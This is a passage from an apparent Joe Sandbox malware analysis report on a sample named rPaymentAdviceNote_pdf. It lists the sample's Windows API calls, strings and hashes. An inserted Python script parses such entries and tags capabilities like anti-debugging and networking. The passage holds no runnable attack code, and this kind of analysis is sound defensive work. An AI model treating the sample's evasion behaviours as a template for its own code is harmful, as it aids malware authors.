                                                              • Opcode Fuzzy Hash: 9284f1319a4972290ef332fc47e9431ea364ea2730af047c8903bc9e992421b1
                                                              • Instruction Fuzzy Hash: C701A771A5110DA7DF15F6A8C942EFE77A8FF16340F140015B805F3292DE254E08D272
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: 613c3e18e4fa1b2bd5d06523226c57e2aab06261f87d373c43e12fcf4b2cc401
                                                              • Instruction ID: 03bb51113b2a1c1e609e6ca2729c1152cc11d0a44d0a93df63d640e2b6cd1106
                                                              • Opcode Fuzzy Hash: 613c3e18e4fa1b2bd5d06523226c57e2aab06261f87d373c43e12fcf4b2cc401
                                                              • Instruction Fuzzy Hash: 82E02B325042282BE71097999C09EA7F7ACFB45B20F000016FD00D3041DA609A058BD0
                                                              APIs
                                                                • Part of subcall function 0087B314: _memset.LIBCMT ref: 0087B321
                                                                • Part of subcall function 00860940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0087B2F0,?,?,?,0084100A), ref: 00860945
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0084100A), ref: 0087B2F4
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0084100A), ref: 0087B303
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0087B2FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 3158253471-631824599
                                                              • Opcode ID: bb1affba04200ebd718843690fdfdc478a404a09850317f62eb42ca3c19dbc2e
                                                              • Instruction ID: be3d2db30649ba30dd21f8c56efb65b7ab1079dc760f2c49bdb109f21090f69b
                                                              • Opcode Fuzzy Hash: bb1affba04200ebd718843690fdfdc478a404a09850317f62eb42ca3c19dbc2e
                                                              • Instruction Fuzzy Hash: 5EE06D70200B558FE720DF69E4047427AE9FF00704F01892CE55AC7342EBB4D448CFA1
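Every function in this listing is reported in the same layout: an APIs block of `Name.MODULE(args), ref: ADDR` lines (a `Part of subcall function` prefix marks a call reached through a callee rather than one the function makes itself), a Strings block, the memory dump source, and a Similarity block with API/String IDs and fuzzy hashes. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses entries in that layout into a triage table, tags each function by the capability its imports suggest, and decodes the InternetSetOptionW option value shown in the WinINet entry above (00000032 = 50, INTERNET_OPTION_CONNECTED_STATE in wininet.h, with the 8-byte buffer length matching INTERNET_CONNECTED_INFO). The three sample entries are copied from the WinINet, inet_addr/htons and IsDebuggerPresent entries above with the memory-dump and hash lines dropped; the capability buckets and the CAtlBaseModule suppression are this example's own choices. That suppression is the check a reviewer wants here: the entry at 0087B2F4 pairs IsDebuggerPresent with the string "ERROR : Unable to initialize critical section in CAtlBaseModule", which is the ATL CAtlBaseModule constructor deciding whether to emit its own error trace, so tagging it as an anti-debugging check on the API name alone would be a false positive.

```python
import re
from dataclasses import dataclass, field
from typing import NamedTuple
# Constructed sample: three entries copied in the listing's own layout; memory-dump and hash lines dropped.
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008B222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008B2255
Similarity
• String ID: <local>
APIs
  • Part of subcall function 008B7FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008B7DB3,?,00000000,?,?), ref: 008B800D
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008B7DB6
• htons.WSOCK32(00000000,?,00000000), ref: 008B7DF3
Similarity
• String ID: 255.255.255.255
APIs
  • Part of subcall function 0087B314: _memset.LIBCMT ref: 0087B321
  • Part of subcall function 00860940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0087B2F0,?,?,?,0084100A), ref: 00860945
• IsDebuggerPresent.KERNEL32(?,?,?,0084100A), ref: 0087B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0084100A), ref: 0087B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0087B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
"""

# Call line "Name.MODULE(args), ref: ADDR"; the "Part of subcall function ADDR:" prefix marks an indirect call.
API_RE = re.compile(r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
                    r"(?P<name>[A-Za-z_]\w*)\.[A-Z0-9]+"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")

class ApiCall(NamedTuple):
    name: str
    args: list
    ref: str
    parent: str  # caller address on "Part of subcall" lines, "" for direct calls

@dataclass
class Entry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)
    @property
    def direct_apis(self):
        return [c.name for c in self.calls if not c.parent]
    @property
    def subcall_apis(self):
        return [c.name for c in self.calls if c.parent]
    @property
    def anchor(self):  # the first direct call's address labels the function
        return next((c.ref for c in self.calls if not c.parent), None)

def parse_entries(text):
    entries, section, cur = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":  # every entry opens with this header
            cur, section = Entry(), "APIs"
            entries.append(cur)
        elif cur is None or not line:
            pass
        elif line in ("Strings", "Similarity", "Memory Dump Source", "Joe Sandbox IDA Plugin"):
            section = line
        elif section == "APIs" and (m := API_RE.match(line.lstrip("• "))):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], args, m["ref"], m["parent"] or ""))
        elif section == "Strings":  # drop the ", xrefs: ADDR" tail, keep the text
            cur.strings.append(re.sub(r", xrefs: [0-9A-F]{8}$", "", line.lstrip("• ")))
        elif section == "Similarity":
            key, _, value = line.lstrip("• ").partition(": ")
            cur.similarity[key] = value
    return entries

# Capability buckets are this example's own choices, not report categories.
CAPABILITY_TAGS = {
    "anti_debug": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "OutputDebugStringW"},
    "network": {"InternetOpenW", "InternetSetOptionW", "inet_addr", "htons"},
    "encoding": {"WideCharToMultiByte", "MultiByteToWideChar"},
}
WININET_OPTIONS = {50: "INTERNET_OPTION_CONNECTED_STATE"}  # wininet.h; only the value seen here

def tag_entry(entry, include_subcalls=True, suppress_library=True):
    names = set(entry.direct_apis) | (set(entry.subcall_apis) if include_subcalls else set())
    tags = {tag for tag, apis in CAPABILITY_TAGS.items() if names & apis}
    # ATL's CAtlBaseModule ctor calls IsDebuggerPresent only to gate OutputDebugString of this text: library code, not evasion.
    if suppress_library and any("CAtlBaseModule" in s for s in entry.strings):
        tags.discard("anti_debug")
    return tags

def decode_wininet_options(entry):
    """(ref, dwOption, name) for each InternetSetOptionW call whose option is concrete."""
    opts = [(c.ref, int(c.args[1], 16)) for c in entry.calls
            if c.name == "InternetSetOptionW" and len(c.args) > 1 and c.args[1] != "?"]
    return [(ref, opt, WININET_OPTIONS.get(opt, "unknown")) for ref, opt in opts]

def triage(text):
    return [{"anchor": e.anchor, "direct": e.direct_apis, "strings": e.strings,
             "tags": sorted(tag_entry(e)), "wininet": decode_wininet_options(e),
             "string_id": e.similarity.get("String ID")} for e in parse_entries(text)]
```

Feed the full listing text to `triage()` rather than only `SAMPLE` to get one row per function; a row whose anchor is None had only subcall lines, and the tags only say what the imported names suggest, so each hit still needs to be confirmed at the referenced address in the dump.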
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00897C82
                                                                • Part of subcall function 00863358: _doexit.LIBCMT ref: 00863362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: 6b606f1a4a95e274d27e242647dbed62dd79b080fe0d6c7aa22c8dd92b39aceb
                                                              • Instruction ID: 67b59ab25ae649b74498e8b89d0821c3b2ea4949632c0f526c6add579e834f36
                                                              • Opcode Fuzzy Hash: 6b606f1a4a95e274d27e242647dbed62dd79b080fe0d6c7aa22c8dd92b39aceb
                                                              • Instruction Fuzzy Hash: CAD0123239431836E21532AD6D07FDA7648EF15B56F040416FB14D97D349D6859051AA
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00881775
                                                                • Part of subcall function 008BBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0088195E,?), ref: 008BBFFE
                                                                • Part of subcall function 008BBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008BC010
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0088196D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 582185067-3257408948
                                                              • Opcode ID: 29a9ce8fcd503b63dfe20d8ca816a7a116a1ac75bfd0241da6c67e097d9aeb38
                                                              • Instruction ID: ba6c75c5bc25d85954b3c3c6e6ea805dbca7753a26d95f45bfd98520bab9ba8f
                                                              • Opcode Fuzzy Hash: 29a9ce8fcd503b63dfe20d8ca816a7a116a1ac75bfd0241da6c67e097d9aeb38
                                                              • Instruction Fuzzy Hash: F0F0157080200DDFDB15EBA0C988AECBAB8FB08304F54049AE202E21A5CB704F85DF20
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008C59AE
                                                              • PostMessageW.USER32(00000000), ref: 008C59B5
                                                                • Part of subcall function 008A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A52BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: b373004fcda6cc29840d8b433b79fa7bedb207b931a907b5b6fe6b171e1db6df
                                                              • Instruction ID: f1dcf2a4a208499fafc7a18163b418ab18d872463afc1d0d768ba905276a44cd
                                                              • Opcode Fuzzy Hash: b373004fcda6cc29840d8b433b79fa7bedb207b931a907b5b6fe6b171e1db6df
                                                              • Instruction Fuzzy Hash: D5D0C931380711BBF6A4AB709C0BF966625FB15B50F000825B356EA1D1C9F4A800CA54
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008C596E
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008C5981
                                                                • Part of subcall function 008A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A52BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: b94fb104d910561f2b0bd9a48abaeb5165f22616af02705b3e2a11172e388c35
                                                              • Instruction ID: 12b737b5e0de925e9d3778984e61159da4a00481cd06df16625160afb4d4462b
                                                              • Opcode Fuzzy Hash: b94fb104d910561f2b0bd9a48abaeb5165f22616af02705b3e2a11172e388c35
                                                              • Instruction Fuzzy Hash: B0D0C931384711B7F6A4AB709C0BFA66A25FB14B50F000825B35AEA1D1C9F49800CA54